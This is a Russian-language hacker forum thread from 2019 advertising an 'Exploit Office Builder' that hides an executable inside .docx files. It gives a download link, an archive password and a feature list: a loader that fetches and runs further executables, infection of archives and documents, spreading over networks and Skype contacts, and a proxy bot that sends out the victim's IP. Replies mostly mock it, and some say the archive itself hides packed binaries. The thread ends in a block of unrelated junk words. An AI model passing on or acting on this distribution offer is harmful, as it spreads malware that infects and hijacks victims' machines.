malware Exploit Office Builder - внедряет ваш exe в docx + заражение и лоадер 1.0

ClopSka · 07.07.2019

Пароль на архив: 666
Скачать: https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk

Софт эксплуатирует ваш exe в формат .docx который легко можно отправить по почте, сам файл дока не палится не одним АВ если ваш exe то же чистый.

Функционал:

Лоадер (скачивает и запускает доп exe по прямой ссылки, не используйте https/ssl)
Заражает все файлы внутри RAR и ZIP
Заражает все .docx (уже обычным макросом, не таскать же нам приватный эксплойт за собой)
Копирует себя по дискам и лен сетям
Отправляет себя по всем контактам в скайпе
Сокс прокси бот с отправкой IP на почту

Все файлы должны быть в одной папке с билдером при создании docx файла

ClopSka · 07.07.2019

Чистый ВТ: https://www.virustotal.com/gui/file...3b4efd7c68733af35e9d03d57ebefeabc34/detection

corpserves · 07.07.2019

кто проверит на клей чудо это......

Babangida · 07.07.2019

А чё за шляпа у тебя в архиве темидой накрытая? services.exe - Service for Intel(R) HD Graphics Control Panel

VirusTotal

www.virustotal.com

Babangida · 07.07.2019

corpserves сказал(а):

кто проверит на клей чудо это......

У вас должно быть более 500 сообщений для просмотра скрытого контента.

conf.dll - архив, пароль - windowshoststs

ClopSka · 07.07.2019

Babangida сказал(а):

А чё за шляпа у тебя в архиве темидой накрытая? services.exe - Service for Intel(R) HD Graphics Control Panel

VirusTotal

VirusTotal

www.virustotal.com

Сам инжект эксплойта, думал спрячу. т.к в паблике нет. Не пали хоть...и юзайте на виртуалке если очкуете

Babangida · 07.07.2019

По этой ссылке по-ходу стата собирается https://yip.su/1mAct7.mp4

Babangida · 07.07.2019

ClopSka сказал(а):

Сам инжект эксплойта, думал спрячу. т.к в паблике нет. Не пали хоть...

Так ты код свой защищай хоть немного))

ClopSka · 07.07.2019

Babangida сказал(а):

Так ты код свой защищай хоть немного))

А ты еще на ВТ слил exe где CVE эксплойт вшит... это по сути инжект автоматизированный. Разберут и уже на 5 детектов будет.

Удали пост.

corpserves · 07.07.2019

Word 2016 не работает...

chistulya · 08.07.2019

В очко се сунь свой майнер чипушила

H0oligan · 17.08.2019

nce try

Developer · 17.08.2019

Тоже пробовал на 2016, не работает

Nil$ · 17.08.2019

Кто ж на Вирустотал такие вещи проверяет?
Разве только кулхацкеры...

2c71e9 · 17.08.2019

что за шляпа? выслать ип на почту и сокс бот, как туда конектиться? белых айпи сейчас нема, везде наты хренаты и так далее. кикие там 0дей которые не спалятся, о чем вы?

500mhz · 17.08.2019

2c71e9 сказал(а):

что за шляпа? выслать ип на почту и сокс бот, как туда конектиться? белых айпи сейчас нема, везде наты хренаты и так далее. кикие там 0дей которые не спалятся, о чем вы?

Не говори ))) 0дей там )))
Мне как брокеру смешно такое читать даже.

JCAlex Min · 27.08.2019

[QUOTE = "ClopSka, bài: 170697, thành viên: 184045"]

Mật khẩu để lưu trữ: 666
Tải xuống: https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk

Phần mềm sử dụng exe của bạn ở định dạng .docx, có thể dễ dàng gửi qua thư, bản thân tệp dock không ghi nhiều hơn một AV nếu exe của bạn vẫn sạch.

Chức năng:

Trình tải (tải xuống và chạy exe bổ sung qua liên kết trực tiếp, không sử dụng http s / ssl )
Lây nhiễm tất cả các tệp trong RAR và ZIP
Nó lây nhiễm tất cả .docx (đã có macro thông thường, không nên kéo chúng tôi một khai thác riêng phía sau chúng tôi)
Sao chép chính nó vào ổ đĩa và mạng lanh
Gửi chính mình đến tất cả các địa chỉ liên lạc trên Skype
Sox proxy bot với việc gửi IP đến thư

Tất cả các tệp phải nằm trong cùng thư mục với trình tạo khi tạo tệp docx

[/ HỎI]
Fake fake fake... Do not sus....lol

MonkeyDeLuffy · 27.08.2019

прикольно, на проге в заголовке Builder 2019 by Vazonez - тс какой нах вазонез в 2019 году? )))
уже только одно это могло сказать что нужно удалить топ, а тут еще куча народу уже факает - лол

JCAlex Min · 28.08.2019

ClopSka сказал(а):

Пароль на архив: 666
Скачать: https://mega.nz/#!ppphWaYR!Aqls514fkiUsdMs5vfHyq_5AN9-tv5kCv3yYcnA8ZAk

Софт эксплуатирует ваш exe в формат .docx который легко можно отправить по почте, сам файл дока не палится не одним АВ если ваш exe то же чистый.

Функционал:

Лоадер (скачивает и запускает доп exe по прямой ссылки, не используйте https/ssl)

Заражает все файлы внутри RAR и ZIP

Заражает все .docx (уже обычным макросом, не таскать же нам приватный эксплойт за собой)

Копирует себя по дискам и лен сетям

Отправляет себя по всем контактам в скайпе

Сокс прокси бот с отправкой IP на почту

Все файлы должны быть в одной папке с билдером при создании docx файла

-----------------------------------------------------------
A toddler hacker, you are very childish.

ETH, BTC, XMR, LTC ???????????????????

badcapper · 28.08.2019

почему таким пассажирам не дают пермач?

malware Exploit Office Builder - внедряет ваш exe в docx + заражение и лоадер 1.0

CD-диск

CD-диск

(L3) cache

RAID-массив

RAID-массив

CD-диск

RAID-массив

RAID-массив

CD-диск

(L3) cache

CD-диск

HDD-drive

CD-диск

(L1) cache

Газонокосильщик

(L1) cache

CD-диск

HDD-drive

CD-диск

(L1) cache